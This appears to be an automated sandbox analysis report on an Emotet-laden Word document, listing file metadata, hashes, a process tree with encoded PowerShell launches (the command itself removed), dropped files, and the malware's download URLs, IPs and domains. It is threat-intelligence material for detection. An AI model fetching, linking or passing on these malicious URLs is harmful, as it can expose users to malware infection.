Field | Value
---|---
File name | informazioni.doc
Full analysis | https://app.any.run/tasks/8d103092-d733-4bde-9c03-cfccabd87ca6
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.
Analysis date | September 26, 2019, 14:17:21
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | -
Indicators | -
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: August Hoeger, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 24 07:15:00 2019, Last Saved Time/Date: Tue Sep 24 07:15:00 2019, Number of Pages: 1, Number of Words: 86, Number of Characters: 492, Security: 0
MD5 | D175760299BCA2928B969E05A84678DA
SHA1 | E411435DC526E5693AB356DB1D0C62C410BCE852
SHA256 | 6C12A45DFB1C4643E89D214888CD7561534D1E69FB941314AB6A40F12D8B65EC
SSDEEP | 3072:QzDQw3tj8JshF6Cc86iNSnX662Yzs3UFAYxPxTqf7p1y14o:QzDQw3tj8JshF6Cr6WSnqAs3URPxTqf1
Extension | Detected type (score)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
CompObjUserType | Microsoft Word 97-2003 Document
CompObjUserTypeLen | 32
HeadingPairs | -
TitleOfParts | -
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 16
CharCountWithSpaces | 577
Paragraphs | 1
Lines | 4
Company | -
CodePage | Windows Latin 1 (Western European)
Security | None
Characters | 492
Words | 86
Pages | 1
ModifyDate | 2019:09:24 06:15:00
CreateDate | 2019:09:24 06:15:00
TotalEditTime | -
Software | Microsoft Office Word
RevisionNumber | 1
LastModifiedBy | -
Template | Normal.dotm
Comments | -
Keywords | -
Author | August Hoeger
Subject | -
Title | -
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2928 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\informazioni.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | |
2372 | powershell -encod [encoded command removed] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | |
3264 | powershell -encod [encoded command removed] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | |
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4D71.tmp.cvr | — | — | —
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B12C01D0.wmf | wmf | F2909DD2AE48AAE075B6674418EBD38C | 5BC206D5B05AE5978D7824AA97437B4C1F28A64F0867BF035BC1C13202814BFF
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A5E646.wmf | wmf | 9CF716E15B96AF4E39533EA0485E8A11 | EB8A7A76389C298EFA76C77CE877A4531DF900A0CD03732CB2999280A1C0BEDF
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 0A718F45D46806D1582CCBAEC32F9280 | D42C1977F6FE2933E07E739C3F164E9E6A5044AB10FB81B41A719ED3D9C105A9
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E73CB05A.wmf | wmf | 44ACBA25F8039ADCB8E6C51C6B2A037E | B7E7D22060705DA44AE7752A1F100DBD4E299432E4FA9350715BB6F0EECC7E44
2928 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 0F0C08535A64B51F025E968156938DCB | 5D034F9BE7A28E3BC52FB7F0AB9CCC128625A6973977286B895AF12E5E2283A0
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$formazioni.doc | pgc | BDF91064B501F726AAAF96A29BC68842 | 95991919D2D8E4A4BC15D504099738FCE7D8B0AE1656D6DAA55F221FD73729C8
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\203A2978.wmf | wmf | D23619770FE324ABFB2DC73CD256E07E | B437550538A3FFFE02D4222F2AA7828AD32FC60F903676FB5933DFA6B721D4C0
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA97DD6D.wmf | wmf | 6FBBA24FF99EF1D78E29A8E2A75EA264 | 32339C7ADD36D28D12FDFED346D4F9C5F0CC2ED3049C86A66E367C00164E7E36
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC4D585E.wmf | wmf | 25FAD3EA2C8039A197BFC38086329F6C | 6F062C013B6FAC418B1688ADD35EA433173232C3120E709B383C9D220A0E3B6F
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2372 | powershell.exe | GET | 404 | 50.62.198.70:80 | http://purepropertiesobx.com/menusa/edt222/ | US | xml | 345 b | malicious |
2372 | powershell.exe | GET | 404 | 132.148.237.202:80 | http://sidanah.com/wp-admin/6dtjzp2161/ | US | xml | 345 b | malicious |
3264 | powershell.exe | GET | 404 | 132.148.237.202:80 | http://sidanah.com/wp-admin/6dtjzp2161/ | US | xml | 345 b | malicious |
3264 | powershell.exe | GET | 404 | 50.62.198.70:80 | http://purepropertiesobx.com/menusa/edt222/ | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2372 | powershell.exe | 50.62.198.70:80 | purepropertiesobx.com | GoDaddy.com, LLC | US | suspicious |
3264 | powershell.exe | 50.62.198.70:80 | purepropertiesobx.com | GoDaddy.com, LLC | US | suspicious |
3264 | powershell.exe | 167.71.197.111:443 | indonesiaexp.com | — | US | unknown |
3264 | powershell.exe | 173.214.180.193:443 | bhubaneswarambulance.com | KVCHOSTING.COM LLC | US | malicious |
2372 | powershell.exe | 167.71.197.111:443 | indonesiaexp.com | — | US | unknown |
2372 | powershell.exe | 132.148.237.202:80 | sidanah.com | GoDaddy.com, LLC | US | unknown |
2372 | powershell.exe | 173.214.180.193:443 | bhubaneswarambulance.com | KVCHOSTING.COM LLC | US | malicious |
3264 | powershell.exe | 132.148.237.202:80 | sidanah.com | GoDaddy.com, LLC | US | unknown |
Domain | IP | Reputation
---|---|---
bhubaneswarambulance.com | — | malicious
indonesiaexp.com | — | unknown
purepropertiesobx.com | — | malicious
sidanah.com | — | malicious
potoretocreative.com | — | unknown